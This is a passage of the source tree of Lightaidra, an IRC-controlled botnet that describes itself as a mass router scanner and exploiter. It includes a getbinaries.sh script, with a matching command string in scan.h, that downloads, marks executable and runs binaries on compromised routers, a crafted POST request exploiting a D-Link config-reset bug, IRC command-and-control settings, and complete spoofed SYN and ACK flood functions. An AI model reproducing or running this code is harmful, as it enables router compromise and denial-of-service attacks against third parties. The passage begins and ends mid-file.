- scan local ip range with d-link config reset bug 24 | * .stop - stop current operation (scan/dos) 25 | * 26 | * *** DDos Commands: 27 | * NOTE: to 0 = random ports, to 0 = random spoofing, 28 | * use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs 29 | * where: *=syn,ngsyn,ack,nsack m=mipsel a=arm p=ppc s=superh x=x86 30 | * 31 | * .spoof - set the source address ip spoof 32 | * .synflood - tcp syn flooder 33 | * .ngsynflood - tcp ngsyn flooder (new generation) 34 | * .ackflood - tcp ack flooder 35 | * .ngackflood - tcp ngack flooder (new generation) 36 | * 37 | * *** IRC Commands: 38 | * 39 | * .setchan - set new master channel 40 | * .join - join bot in selected room 41 | * .part - part bot from selected room 42 | * .quit - kill the current process 43 | * 44 | * *** EOF 45 | 46 | -------------------------------------------------------------------------------- /lightaidra/docs/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2008-2015 Federico Fazzi 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /lightaidra/getbinaries.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. 3 | # UPLOAD GETBINARIES.SH IN YOUR HTTPD. 4 | # 5 | # LEGAL DISCLAIMER: It is the end user's responsibility to obey 6 | # all applicable local, state and federal laws. Developers assume 7 | # no liability and are not responsible for any misuse or damage 8 | # caused by this program. 9 | 10 | # YOUR HTTPD SERVER: 11 | REFERENCE_HTTP="http://127.0.0.1" 12 | 13 | # NAME OF BINARIES: 14 | REFERENCE_MIPSEL="mipsel" 15 | REFERENCE_MIPS="mips" 16 | REFERENCE_SUPERH="sh" 17 | REFERENCE_ARM="arm" 18 | REFERENCE_PPC="ppc" 19 | 20 | rm -fr /var/run/${REFERENCE_MIPSEL} \ 21 | /var/run/${REFERENCE_MIPS} \ 22 | /var/run/${REFERENCE_SUPERH} \ 23 | /var/run/${REFERENCE_ARM} \ 24 | /var/run/${REFERENCE_PPC} 25 | 26 | wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL} 27 | wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS} 28 | wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM} 29 | wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC} 30 | wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH} 31 | 32 | sleep 3; 33 | rm -fr /var/run/getbinaries.sh 34 | -------------------------------------------------------------------------------- /lightaidra/include/attacks.h: -------------------------------------------------------------------------------- 1 | #ifndef __ATTACKS_H_ 2 | #define __ATTACKS_H_ 3 | 4 | unsigned long srchost; 5 | unsigned int dsthost; 6 | unsigned short uport; 7 | unsigned int useconds; 8 | 9 | struct send_tcp { 10 | struct iphdr ip; 11 | struct tcphdr tcp; 12 | char buf[20]; 13 | }; 14 | 15 | struct pseudo_header { 16 | unsigned int source_address; 17 | unsigned int dest_address; 18 | unsigned char placeholder; 19 | unsigned char protocol; 20 | unsigned short tcp_length; 21 | struct tcphdr tcp; 22 | char buf[20]; 23 | }; 24 | 25 | #endif 26 | -------------------------------------------------------------------------------- /lightaidra/include/config.h: -------------------------------------------------------------------------------- 1 | #ifndef __CONFIG_H_ 2 | #define __CONFIG_H_ 3 | 4 | /* BACKGROUND MODE '0', DEBUG MODE '1' (JUST FOR DEVELOPERS) */ 5 | #define background_mode 1 6 | 7 | /* IRC SERVER SYNTAX: IP:PORT */ 8 | /* OR IP:PORT|IP:PORT|IP:PORT ETC.. TO ADD MORE (MAX 10) */ 9 | /* WARNING: DON'T CHANGE PASSPROTO VALUE IF YOU DON'T */ 10 | /* HAVE AN MODDED PROTOCOL IRCD!!! */ 11 | #define irc_servers "chat.freenode.net:6666" 12 | #define passproto "PASS" 13 | #define irc_passwd "fuckya" 14 | /* IRC SERVER ENCRYPTED 0=IRC_SERVERS 1=ENC_SERVERS */ 15 | /* USE HIDE.C TO CREATE YOUR CRYPTED SERVER LIST */ 16 | #define encirc 0 17 | #define enc_servers ">.,C_>C>,C@<@U+<<.,C_>C>,C@<>U+<<.,C_>C>,C@<.,C_>C>,C@<_U+<<<" 18 | #define enc_passwd "bcdi" 19 | 20 | /* CHANNEL NAME */ 21 | #define irc_chan "#testzeus" 22 | /* ENABLE FULL MESSAGES, '0'=OFF '1'=ON */ 23 | /* NOTE: THAT PRODUCE MORE LAG! */ 24 | #define all_messages 1 25 | /* CHANNEL KEY */ 26 | #define irc_chankey "key" 27 | 28 | /* MASTER HOSTNAME WILL BE ABLE TO PERFORM AUTHENTICATION */ 29 | #define master_host "@hostname.tld" 30 | /* MASTER PASSWORD AUTHENTICATION (BOT PARTYLINE) */ 31 | #define master_password "pwn" 32 | 33 | /* HTTP REFERENCE (WHERE YOU UPLOAD BINARIES AND GETBINARIES.SH) */ 34 | #define reference_http "http://127.0.0.1" 35 | 36 | /* NAME OF BINARIES: IF YOU CHANGE THESE VALUES, DON'T FORGET */ 37 | /* TO CHANGE TOO IN MAKEFILE AND GETBINARIES.SH */ 38 | #define reference_mipsel "mipsel" 39 | #define reference_mips "mips" 40 | #define reference_superh "sh" 41 | #define reference_arm "arm" 42 | #define reference_ppc "ppc" 43 | 44 | /* NICKNAME PREFIX: */ 45 | /* WARNING: DO NOT CHANGE NCTYPE VALUE! */ 46 | /* NOTE: MAXTHREADS ARE FOR SCANNER, */ 47 | /* DON'T CHANGE IF YOU DON'T KNOW WHAT */ 48 | /* YOU ARE DOING! */ 49 | #ifdef MIPSEL 50 | #define irc_nick_prefix "[MS]" 51 | #define nctype "m" 52 | #define maxthreads (128) 53 | #elif MIPS 54 | #define irc_nick_prefix "[M]" 55 | #define nctype "m" 56 | #define maxthreads (128) 57 | #elif SUPERH 58 | #define irc_nick_prefix "[S]" 59 | #define nctype "s" 60 | #define maxthreads (128) 61 | #elif ARM 62 | #define irc_nick_prefix "[A]" 63 | #define nctype "a" 64 | #define maxthreads (128) 65 | #elif PPC 66 | #define irc_nick_prefix "[P]" 67 | #define nctype "p" 68 | #define maxthreads (128) 69 | #else 70 | #define irc_nick_prefix "[X]" 71 | #define nctype "x" 72 | #define maxthreads (128) 73 | #endif 74 | 75 | #endif 76 | -------------------------------------------------------------------------------- /lightaidra/include/headers.h: -------------------------------------------------------------------------------- 1 | #ifndef __HEADERS_H_ 2 | #define __HEADERS_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "main.h" 24 | #include "config.h" 25 | #include "utils.h" 26 | #include "irc.h" 27 | #include "requests.h" 28 | #include "scan.h" 29 | #include "attacks.h" 30 | 31 | #undef EXIT_FAILURE 32 | #define EXIT_FAILURE -1 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /lightaidra/include/irc.h: -------------------------------------------------------------------------------- 1 | #ifndef __IRC_H_ 2 | #define __IRC_H_ 3 | 4 | #define static_rcv 32 5 | 6 | typedef struct { 7 | int sockfd; 8 | struct hostent *sockhs; 9 | struct sockaddr_in sockadr; 10 | 11 | } sock_t; 12 | 13 | typedef struct { 14 | char rcv_a[128]; 15 | char rcv_b[static_rcv]; 16 | char rcv_c[static_rcv]; 17 | char rcv_sa[static_rcv]; 18 | char rcv_sb[static_rcv]; 19 | char rcv_sc[static_rcv]; 20 | char rcv_sd[static_rcv]; 21 | char rcv_se[static_rcv]; 22 | } requests_t; 23 | 24 | int max_pids, pid_status; 25 | unsigned int recv_bytes; 26 | 27 | char *data_ptr, channel[32]; 28 | char netbuf[sizebuf]; 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /lightaidra/include/main.h: -------------------------------------------------------------------------------- 1 | #ifndef __MAIN_H_ 2 | #define __MAIN_H_ 3 | 4 | #define true (0) 5 | #define false (-1) 6 | 7 | #define result_file "/var/run/.lightscan" 8 | #define pidfile "/var/run/.lightpid" 9 | 10 | #define sizebuf 2048 11 | 12 | unsigned short counter, total; 13 | char *isrv[10]; 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /lightaidra/include/requests.h: -------------------------------------------------------------------------------- 1 | #ifndef __REQUESTS_H_ 2 | #define __REQUESTS_H_ 3 | 4 | int login_status, stop; 5 | int random_ct, random_num; 6 | char *token, status_temp[128], nt[3]; 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /lightaidra/include/scan.h: -------------------------------------------------------------------------------- 1 | #ifndef __SCAN_H 2 | #define __SCAN_H 3 | 4 | #define telnet_port (23) 5 | #define http_port (80) 6 | 7 | #define maxhosts (65535) 8 | 9 | typedef struct { 10 | char hostname[32]; 11 | } scan_data_t; 12 | 13 | FILE *resfd, *statfd; 14 | char resbuf[21], restag[21]; 15 | char hosts[maxhosts][16]; 16 | 17 | unsigned short total, founds; 18 | char psw_x[32], psw_y[32]; 19 | char __netbuf[sizebuf]; 20 | 21 | struct timeval tm; 22 | int timeout_value; 23 | 24 | sock_t *scan_sp; 25 | pid_t pid, g_pid; 26 | 27 | #define getbinaries "rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&\n" 28 | 29 | /* CONFIG RESET BUG: POST request. */ 30 | #define post_request "POST /cgi-bin/firmwarecfg HTTP/1.1\r\n" \ 31 | "Host: $IP\r\n" \ 32 | "User-Agent: veryprivateacsor\r\n" \ 33 | "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n" \ 34 | "Accept-Language: en-us,en;q=0.5\r\n" \ 35 | "Accept-Encoding: gzip,deflate\r\n" \ 36 | "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" \ 37 | "Keep-Alive: 300\r\n" \ 38 | "Connection: keep-alive\r\n" \ 39 | "Content-Type: multipart/form-data; \r\n" \ 40 | "boundary=---------------------------41184676334\r\n" \ 41 | "Content-Length: 234\r\n" \ 42 | "\r\n" \ 43 | "-----------------------------41184676334\r\n" \ 44 | "Content-Disposition: form-data; name=\"config.x\"\r\n" \ 45 | "\r\n" \ 46 | "\r\n" \ 47 | "-----------------------------41184676334\r\n" \ 48 | "Content-Disposition: form-data; name=\"config.y\"\r\n" \ 49 | "\r\n" \ 50 | "\r\n" \ 51 | "-----------------------------41184676334--\r\n" 52 | 53 | #endif 54 | -------------------------------------------------------------------------------- /lightaidra/include/utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTILS_H_ 2 | #define __UTILS_H_ 3 | 4 | #define IPREQUEST "GET /index.html HTTP/1.0\nHost: icanhazip.comn\n" 5 | 6 | #ifdef MIPSEL 7 | #define ipreq "64.182.208.183" 8 | #elif MIPS 9 | #define ipreq "104.238.136.31" 10 | #elif SUPERH 11 | #define ipreq "104.238.141.75" 12 | #elif ARM 13 | #define ipreq "104.238.141.75" 14 | #elif PPC 15 | #define ipreq "104.238.136.31" 16 | #else 17 | #define ipreq "104.238.141.75" 18 | #endif 19 | 20 | char decodedsrv[512], decodedpsw[32]; 21 | pid_t daemonize_pid; 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /lightaidra/source/attacks.c: -------------------------------------------------------------------------------- 1 | /* 2 | * attacks.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | unsigned int get_spoofed(); 17 | unsigned short in_cksum(unsigned short *ptr, int nbytes); 18 | int sockwrite(int sd, const char *fmt, ...); 19 | 20 | 21 | /* synflood(), ngsynflood(), ackflood(), ngackflood() */ 22 | /* these functions are adapted from ktx.c */ 23 | void synflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 24 | int get; 25 | struct send_tcp send_tcp; 26 | struct pseudo_header pseudo_header; 27 | struct sockaddr_in sin; 28 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 29 | unsigned int psize = 20, source, dest, check; 30 | unsigned long saddr, daddr, secs; 31 | time_t start = time(NULL); 32 | 33 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 34 | exit(EXIT_FAILURE); { 35 | int i; 36 | 37 | for (i = 0; i < 20; i++) { 38 | send_tcp.buf[i] = (u_char) syn[i]; 39 | } 40 | } 41 | 42 | daddr = dest_addr; 43 | secs = ntime; 44 | 45 | send_tcp.ip.ihl = 5; 46 | send_tcp.ip.version = 4; 47 | send_tcp.ip.tos = 16; 48 | send_tcp.ip.frag_off = 64; 49 | send_tcp.ip.ttl = 64; 50 | send_tcp.ip.protocol = 6; 51 | send_tcp.tcp.ack_seq = 0; 52 | send_tcp.tcp.doff = 10; 53 | send_tcp.tcp.res1 = 0; 54 | send_tcp.tcp.cwr = 0; 55 | send_tcp.tcp.ece = 0; 56 | send_tcp.tcp.urg = 0; 57 | send_tcp.tcp.ack = 0; 58 | send_tcp.tcp.psh = 0; 59 | send_tcp.tcp.rst = 0; 60 | send_tcp.tcp.fin = 0; 61 | send_tcp.tcp.syn = 1; 62 | send_tcp.tcp.window = 30845; 63 | send_tcp.tcp.urg_ptr = 0; 64 | dest = htons(dest_port); 65 | 66 | while (1) { 67 | source = rand(); 68 | if (dest_port == 0) dest = rand(); 69 | 70 | if (srchost == 0) saddr = get_spoofed(); 71 | else saddr = srchost; 72 | 73 | send_tcp.ip.tot_len = htons(40 + psize); 74 | send_tcp.ip.id = rand(); 75 | send_tcp.ip.saddr = saddr; 76 | send_tcp.ip.daddr = daddr; 77 | send_tcp.ip.check = 0; 78 | send_tcp.tcp.source = source; 79 | send_tcp.tcp.dest = dest; 80 | send_tcp.tcp.seq = rand(); 81 | send_tcp.tcp.check = 0; 82 | sin.sin_family = AF_INET; 83 | sin.sin_port = dest; 84 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 85 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 86 | check = rand(); 87 | send_tcp.buf[9] = ((char *)&check)[0]; 88 | send_tcp.buf[10] = ((char *)&check)[1]; 89 | send_tcp.buf[11] = ((char *)&check)[2]; 90 | send_tcp.buf[12] = ((char *)&check)[3]; 91 | pseudo_header.source_address = send_tcp.ip.saddr; 92 | pseudo_header.dest_address = send_tcp.ip.daddr; 93 | pseudo_header.placeholder = 0; 94 | pseudo_header.protocol = IPPROTO_TCP; 95 | pseudo_header.tcp_length = htons(20 + psize); 96 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 97 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 98 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 99 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 100 | 101 | if (a >= 50) { 102 | if (time(NULL) >= start + secs) { 103 | sockwrite(sp->sockfd, "PRIVMSG %s :[nsynflood] packeting completed!\n", channel); 104 | close(get); 105 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 106 | exit(EXIT_SUCCESS); 107 | } 108 | 109 | a = 0; 110 | } 111 | 112 | a++; 113 | } 114 | 115 | close(get); 116 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 117 | exit(EXIT_FAILURE); 118 | } 119 | 120 | void ngsynflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 121 | int get; 122 | struct send_tcp send_tcp; 123 | struct pseudo_header pseudo_header; 124 | struct sockaddr_in sin; 125 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 126 | unsigned int psize = 20, source, dest, check; 127 | unsigned long saddr, daddr, secs; 128 | time_t start = time(NULL); 129 | 130 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 131 | exit(EXIT_FAILURE); { 132 | int i; 133 | 134 | for (i = 0; i < 20; i++) { 135 | send_tcp.buf[i] = (u_char) syn[i]; 136 | } 137 | } 138 | 139 | daddr = dest_addr; 140 | secs = ntime; 141 | 142 | send_tcp.ip.ihl = 5; 143 | send_tcp.ip.version = 4; 144 | send_tcp.ip.tos = 16; 145 | send_tcp.ip.frag_off = 64; 146 | send_tcp.ip.ttl = 64; 147 | send_tcp.ip.protocol = 6; 148 | send_tcp.tcp.ack_seq = 0; 149 | send_tcp.tcp.doff = 10; 150 | send_tcp.tcp.res1 = 0; 151 | send_tcp.tcp.cwr = 0; 152 | send_tcp.tcp.ece = 0; 153 | send_tcp.tcp.urg = 0; 154 | send_tcp.tcp.ack = 0; 155 | send_tcp.tcp.psh = 0; 156 | send_tcp.tcp.rst = 0; 157 | send_tcp.tcp.fin = 0; 158 | send_tcp.tcp.syn = 1; 159 | send_tcp.tcp.window = 30845; 160 | send_tcp.tcp.urg_ptr = 0; 161 | dest = htons(dest_port); 162 | 163 | while (1) { 164 | source = rand(); 165 | if (dest_port == 0) dest = rand(); 166 | 167 | if (srchost == 0) saddr = get_spoofed(); 168 | else saddr = srchost; 169 | 170 | send_tcp.ip.tot_len = htons(40 + psize); 171 | send_tcp.ip.id = rand(); 172 | send_tcp.ip.saddr = saddr; 173 | send_tcp.ip.daddr = daddr; 174 | send_tcp.ip.check = 0; 175 | send_tcp.tcp.source = source; 176 | send_tcp.tcp.dest = dest; 177 | send_tcp.tcp.seq = rand(); 178 | send_tcp.tcp.check = 0; 179 | sin.sin_family = AF_INET; 180 | sin.sin_port = dest; 181 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 182 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 183 | check = rand(); 184 | send_tcp.buf[9] = ((char *)&check)[0]; 185 | send_tcp.buf[10] = ((char *)&check)[1]; 186 | send_tcp.buf[11] = ((char *)&check)[2]; 187 | send_tcp.buf[12] = ((char *)&check)[3]; 188 | pseudo_header.source_address = send_tcp.ip.saddr; 189 | pseudo_header.dest_address = send_tcp.ip.daddr; 190 | pseudo_header.placeholder = 0; 191 | pseudo_header.protocol = IPPROTO_TCP; 192 | pseudo_header.tcp_length = htons(20 + psize); 193 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 194 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 195 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 196 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 197 | 198 | if (a >= 50) { 199 | if (time(NULL) >= start + secs) { 200 | sockwrite(sp->sockfd, "PRIVMSG %s :[ngsynflood] packeting completed!\n", channel); 201 | close(get); 202 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 203 | exit(EXIT_SUCCESS); 204 | } 205 | 206 | a = 0; 207 | } 208 | 209 | a++; 210 | } 211 | 212 | close(get); 213 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 214 | exit(EXIT_FAILURE); 215 | } 216 | 217 | void ackflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 218 | int get; 219 | struct send_tcp send_tcp; 220 | struct pseudo_header pseudo_header; 221 | struct sockaddr_in sin; 222 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 223 | unsigned int psize = 20, source, dest, check; 224 | unsigned long saddr, daddr, secs; 225 | time_t start = time(NULL); 226 | 227 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 228 | exit(EXIT_FAILURE); { 229 | int i; 230 | for (i = 0; i < 20; i++) 231 | send_tcp.buf[i] = (u_char) syn[i]; 232 | } 233 | 234 | daddr = dest_addr; 235 | secs = ntime; 236 | dest = htons(dest_port); 237 | 238 | send_tcp.ip.ihl = 5; 239 | send_tcp.ip.version = 4; 240 | send_tcp.ip.tos = 16; 241 | send_tcp.ip.frag_off = 64; 242 | send_tcp.ip.ttl = 255; 243 | send_tcp.ip.protocol = 6; 244 | send_tcp.tcp.doff = 5; 245 | send_tcp.tcp.res1 = 0; 246 | send_tcp.tcp.cwr = 0; 247 | send_tcp.tcp.ece = 0; 248 | send_tcp.tcp.urg = 0; 249 | send_tcp.tcp.ack = 1; 250 | send_tcp.tcp.psh = 1; 251 | send_tcp.tcp.rst = 0; 252 | send_tcp.tcp.fin = 0; 253 | send_tcp.tcp.syn = 0; 254 | send_tcp.tcp.window = 30845; 255 | send_tcp.tcp.urg_ptr = 0; 256 | 257 | while (1) { 258 | if (dest_port == 0) dest = rand(); 259 | if (srchost == 0) saddr = get_spoofed(); 260 | else saddr = srchost; 261 | 262 | send_tcp.ip.tot_len = htons(40 + psize); 263 | send_tcp.ip.id = rand(); 264 | send_tcp.ip.check = 0; 265 | send_tcp.ip.saddr = saddr; 266 | send_tcp.ip.daddr = daddr; 267 | send_tcp.tcp.source = rand(); 268 | send_tcp.tcp.dest = dest; 269 | send_tcp.tcp.seq = rand(); 270 | send_tcp.tcp.ack_seq = rand(); 271 | send_tcp.tcp.check = 0; 272 | sin.sin_family = AF_INET; 273 | sin.sin_port = send_tcp.tcp.dest; 274 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 275 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 276 | check = in_cksum((unsigned short *)&send_tcp, 40); 277 | pseudo_header.source_address = send_tcp.ip.saddr; 278 | pseudo_header.dest_address = send_tcp.ip.daddr; 279 | pseudo_header.placeholder = 0; 280 | pseudo_header.protocol = IPPROTO_TCP; 281 | pseudo_header.tcp_length = htons(20 + psize); 282 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 283 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 284 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 285 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 286 | 287 | if (a >= 50) { 288 | if (time(NULL) >= start + secs) { 289 | sockwrite(sp->sockfd, "PRIVMSG %s :[ackflood] packeting completed!\n", channel); 290 | close(get); 291 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 292 | exit(EXIT_SUCCESS); 293 | } 294 | 295 | a = 0; 296 | } 297 | 298 | a++; 299 | } 300 | 301 | close(get); 302 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 303 | 304 | exit(EXIT_FAILURE); 305 | } 306 | 307 | void ngackflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 308 | int get; 309 | struct send_tcp send_tcp; 310 | struct pseudo_header pseudo_header; 311 | struct sockaddr_in sin; 312 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 313 | unsigned int psize = 20, source, dest, check; 314 | unsigned long saddr, daddr, secs; 315 | time_t start = time(NULL); 316 | 317 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 318 | exit(EXIT_FAILURE); { 319 | int i; 320 | 321 | for (i = 0; i < 20; i++) { 322 | send_tcp.buf[i] = (u_char) syn[i]; 323 | } 324 | } 325 | 326 | daddr = dest_addr; 327 | secs = ntime; 328 | dest = htons(dest_port); 329 | 330 | send_tcp.ip.ihl = 5; 331 | send_tcp.ip.version = 4; 332 | send_tcp.ip.tos = 16; 333 | send_tcp.ip.frag_off = 64; 334 | send_tcp.ip.ttl = 255; 335 | send_tcp.ip.protocol = 6; 336 | send_tcp.tcp.doff = 5; 337 | send_tcp.tcp.res1 = 0; 338 | send_tcp.tcp.cwr = 0; 339 | send_tcp.tcp.ece = 0; 340 | send_tcp.tcp.urg = 0; 341 | send_tcp.tcp.ack = 1; 342 | send_tcp.tcp.psh = 1; 343 | send_tcp.tcp.rst = 0; 344 | send_tcp.tcp.fin = 0; 345 | send_tcp.tcp.syn = 0; 346 | send_tcp.tcp.window = 30845; 347 | send_tcp.tcp.urg_ptr = 0; 348 | 349 | while (1) { 350 | if (dest_port == 0) dest = rand(); 351 | 352 | if (srchost == 0) saddr = get_spoofed(); 353 | else saddr = srchost; 354 | 355 | send_tcp.ip.tot_len = htons(40 + psize); 356 | send_tcp.ip.id = rand(); 357 | send_tcp.ip.check = 0; 358 | send_tcp.ip.saddr = saddr; 359 | send_tcp.ip.daddr = daddr; 360 | send_tcp.tcp.source = rand(); 361 | send_tcp.tcp.dest = dest; 362 | send_tcp.tcp.seq = rand(); 363 | send_tcp.tcp.ack_seq = rand(); 364 | send_tcp.tcp.check = 0; 365 | sin.sin_family = AF_INET; 366 | sin.sin_port = send_tcp.tcp.dest; 367 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 368 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 369 | check = in_cksum((unsigned short *)&send_tcp, 40); 370 | pseudo_header.source_address = send_tcp.ip.saddr; 371 | pseudo_header.dest_address = send_tcp.ip.daddr; 372 | pseudo_header.placeholder = 0; 373 | pseudo_header.protocol = IPPROTO_TCP; 374 | pseudo_header.tcp_length = htons(20 + psize); 375 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 376 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 377 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 378 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 379 | 380 | if (a >= 50) { 381 | if (time(NULL) >= start + secs) { 382 | sockwrite(sp->sockfd, "PRIVMSG %s :[ngackflood] packeting completed!\n", channel); 383 | close(get); 384 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 385 | exit(EXIT_SUCCESS); 386 | } 387 | 388 | a = 0; 389 | } 390 | 391 | a++; 392 | } 393 | 394 | close(get); 395 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 396 | 397 | exit(EXIT_FAILURE); 398 | } 399 | -------------------------------------------------------------------------------- /lightaidra/source/hide.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hide.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | * example: ./hide -encode "127.0.0.1:6667" 13 | * ./hide -decode ">@.CU,,,." <- copy into config.h 14 | * CHANGE THE POSITION OF ENCODES[] VALUES IF YOU WANT YOUR PRIVATE ENCODING. 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | char encodes[] = { 21 | '<', '>', '@', '_', ';', ':', ',', '.', '-', '+', '*', '^', '?', '=', ')', '(', 22 | '|', 'A', 'B', '&', '%', '$', 'D', '"', '!', 'w', 'k', 'y', 'x', 'z', 'v', 'u', 23 | 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'i', 'h', 'g', 'f', 'e', 'd', 'c', 24 | 'b', 'a', '~', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'F', 'U', 'C', 'K' 25 | }; 26 | 27 | char decodes[] = { 28 | '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 29 | 'g', 'h', 'i', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'z', 'y', 30 | 'w', 'k', 'x', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'L', 'M', 'N', 